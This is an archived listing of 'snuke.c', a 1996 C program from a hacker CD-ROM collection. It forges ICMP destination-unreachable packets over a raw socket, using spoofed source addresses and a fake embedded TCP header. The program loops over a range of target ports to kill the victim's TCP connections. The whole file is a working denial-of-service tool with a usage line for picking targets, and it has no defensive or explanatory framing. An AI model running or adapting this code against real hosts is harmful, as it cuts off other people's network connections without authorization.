home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / hacking / virriiorg / snuke.c < prev    next >
Encoding:
C/C++ Source or Header  |  1996-04-23  |  5.9 KB  |  226 lines
  1. #include <sys/types.h>
  2. #include <sys/socket.h>
  3. #include <netinet/in_systm.h>
  4. #include <netinet/in.h>
  5. #include <netinet/ip.h>
  6. #include <netinet/tcp.h>
  7. #include <netinet/ip_icmp.h>
  8. #include <netdb.h>
  9.  
  10.  
  11. static int thecode;
  12.  
  13. u_short cksum (u_short *, int);
  14. void sendkill (char *, int, char *, int);
  15.  
  16.  
  17. u_short 
  18. cksum (u_short * buf, int nwords)
  19. {
  20.   unsigned long sum;
  21.  
  22.   for (sum = 0; nwords > 0; nwords--)
  23.     sum += *buf++;
  24.   sum = (sum >> 16) + (sum & 0xffff);
  25.   sum += (sum >> 16);
  26.   return ~sum;
  27. }
  28.  
  29. void 
  30. resolve_address (struct sockaddr *addr, char *hostname, u_short port)
  31. {
  32.   struct sockaddr_in *address;
  33.   struct hostent *host;
  34.  
  35.   address = (struct sockaddr_in *) addr;
  36.   (void) bzero ((char *) address, sizeof (struct sockaddr_in));
  37. /* fill in the easy fields */
  38.   address->sin_family = AF_INET;
  39.   address->sin_port = htons (port);
  40. /* first, check if the address is an ip address */
  41.   address->sin_addr.s_addr = inet_addr (hostname);
  42.   if ((int) address->sin_addr.s_addr == -1)
  43.     {
  44.       /*it wasn't.. so we try it as a long host name */
  45.       host = gethostbyname (hostname);
  46.       if (host)
  47.     {
  48.       /* wow.  It's a host name.. set the fields */
  49.       /* ?? address->sin_family = host->h_addrtype; */
  50.       bcopy (host->h_addr, (char *) &address->sin_addr,
  51.          host->h_length);
  52.     }
  53.       else
  54.     {
  55.       /* oops.. can't find it.. */
  56.       puts ("Couldn't resolve address!!!");
  57.       exit (-1);
  58.     }
  59.     }
  60. /* all done. */
  61. }
  62.  
  63. #define PACKETSIZE ( sizeof( struct iphdr ) + sizeof( struct icmphdr ) +  \
  64.                             sizeof( struct iphdr ) + 8 )
  65. #define ICMPSIZE   ( sizeof( struct icmphdr ) + sizeof( struct iphdr ) + 8 )
  66. #define offsetTCP  ( sizeof( struct iphdr ) + sizeof( struct icmphdr ) + \
  67.                             sizeof( struct iphdr ) )
  68. #define offsetIP   ( sizeof( struct iphdr ) + sizeof( struct icmphdr ) )
  69. #define offsetICMP ( sizeof( struct iphdr ) )
  70. #define offsetRIP  ( 0 )
  71.  
  72. void 
  73. sendkill (char *fromhost, int fromport, char *tohost, int toport)
  74. {
  75.   char *packet;
  76.   static struct sockaddr_in local, remote;
  77.   static int sock = 0;
  78.  
  79.   if (!sock)
  80.     {
  81.       resolve_address ((struct sockaddr *) &local, fromhost, fromport);
  82.       resolve_address ((struct sockaddr *) &remote, tohost, toport);
  83.       sock = socket (AF_INET, SOCK_RAW, 255);
  84.       if (sock == -1)
  85.     {
  86.       perror ("Getting raw socket");
  87.       exit (-1);
  88.     }
  89.     }
  90.   /*
  91.      .  Get memory for the packet 
  92.    */
  93.   packet = (char *) malloc (PACKETSIZE);
  94.   if (!packet)
  95.     {
  96.       perror ("Getting space for packet");
  97.       exit (-1);
  98.     }
  99.  
  100.   /*
  101.      . Fill in our pretended TCP header 
  102.      . note - since this was allegedly an outgoing packet...  we have to 
  103.      . flip the source and destination stuff 
  104.    */
  105.   {
  106.     struct tcphdr *fake_tcp;
  107.     fake_tcp = (struct tcphdr *) (packet + offsetTCP);
  108.     fake_tcp->th_dport = htons (fromport);
  109.     fake_tcp->th_sport = htons (toport);
  110.     fake_tcp->th_seq = 0x1984;
  111.   }
  112.   /* 
  113.      . fill in the fake IP header.
  114.      . the same reversal as above still applies.. the packet was sent to 
  115.      . our machine ( yeah right )
  116.    */
  117.   {
  118.     struct iphdr *fake_ip;
  119.     fake_ip = (struct iphdr *) (packet + offsetIP);
  120.  
  121.     /* these fields are irrelevant -- never checked?? */
  122.     fake_ip->version = 4;
  123.     fake_ip->tot_len = htons (0x2C);    /* this was much longer.. once */
  124.     fake_ip->tos = 0;
  125.     fake_ip->id = htons (getpid () & 255);
  126.     fake_ip->frag_off = 0;
  127.     fake_ip->ttl = 24;        /* not so long to live anymore */
  128.     fake_ip->check = 3805;    /* this CAN'T be checked..so do something != 0 */
  129.  
  130.     /* these fields are used ..  */
  131.     fake_ip->ihl = 5;
  132.     bcopy ((char *) &local.sin_addr, &fake_ip->daddr, sizeof (fake_ip->daddr));
  133.     bcopy ((char *) &remote.sin_addr, &fake_ip->saddr, sizeof (fake_ip->saddr));
  134.     fake_ip->protocol = 6;    /* a TCP packet */
  135.   }
  136.  
  137.   /*
  138.      . fill in the ICMP header 
  139.      . this is actally rather trivial, though don't forget the checksum 
  140.    */
  141.   {
  142.     struct icmphdr *icmp;
  143.     icmp = (struct icmphdr *) (packet + offsetICMP);
  144.  
  145.     icmp->type = 3;
  146.     icmp->code = thecode;    /* this will generate an error message */
  147.     icmp->un.gateway = 0;
  148.     icmp->checksum = 0;
  149.     icmp->checksum = cksum ((u_short *) (icmp), ICMPSIZE >> 1);
  150.   }
  151.   /*
  152.      . finally, fill in the IP header 
  153.      . this is almost the same as above.. though this time, it is the
  154.      . ip header that really takes the packet places. make sure the 
  155.      . checksum and addresses are right 
  156.    */
  157.   {
  158.     struct iphdr *real_ip;
  159.     real_ip = (struct iphdr *) packet;
  160.  
  161.     real_ip->version = 4;
  162.     real_ip->ihl = 5;
  163.     real_ip->tot_len = htons (PACKETSIZE);
  164.     real_ip->tos = (7 << 5) | 4;
  165.     real_ip->ttl = 255;
  166.     real_ip->protocol = 1;
  167.     real_ip->check = 0;
  168.     real_ip->id = htons (3);
  169.     real_ip->frag_off = 0;
  170.     bcopy ((char *) &local.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
  171.     bcopy ((char *) &remote.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
  172.     real_ip->saddr = htonl (ntohl (real_ip->daddr) & 0xffffff00L);
  173.     real_ip->check = cksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
  174.   }
  175.   /*
  176.      . 
  177.      . and now.. finally...  send it out into the net 
  178.    */
  179.   {
  180.     int result;
  181.  
  182.     result = sendto (sock, packet, PACKETSIZE, 0,
  183.              (struct sockaddr *) &remote, sizeof (remote));
  184.     if (result != PACKETSIZE)
  185.       {
  186.     perror ("sending packet");
  187.       }
  188.  
  189.   }
  190. }
  191.  
  192. main (int argc, char **argv)
  193. {
  194.   int i, codes;
  195.  
  196.   if (argc != 7)
  197.     {
  198.       puts ("usage: <from host><from port> <target host><target low><target high> <icmp type>");
  199.  
  200.       exit (-1);
  201.     }
  202.  
  203.   thecode = atoi (argv[6]);
  204.   printf ("using code %d \n", thecode);
  205.   if (atoi (argv[5]) > atoi (argv[4]))
  206.     {
  207.       for (i = atoi (argv[5]); i > atoi (argv[4]); i--)
  208.     {
  209.       printf ("%d \n", i);
  210.       sendkill (argv[1], atoi (argv[2]), argv[3], i);
  211.       usleep (30000);
  212.     }
  213.     }
  214.   else if (atoi (argv[4]) > atoi (argv[5]))
  215.     {
  216.       for (i = atoi (argv[5]); i < atoi (argv[4]); i++)
  217.     {
  218.       printf ("%d \n", i);
  219.       sendkill (argv[1], atoi (argv[2]), argv[3], i);
  220.       usleep (30000);
  221.     }
  222.     }
  223.   else
  224.     sendkill (argv[1], atoi (argv[2]), argv[3], i);
  225. }
  226.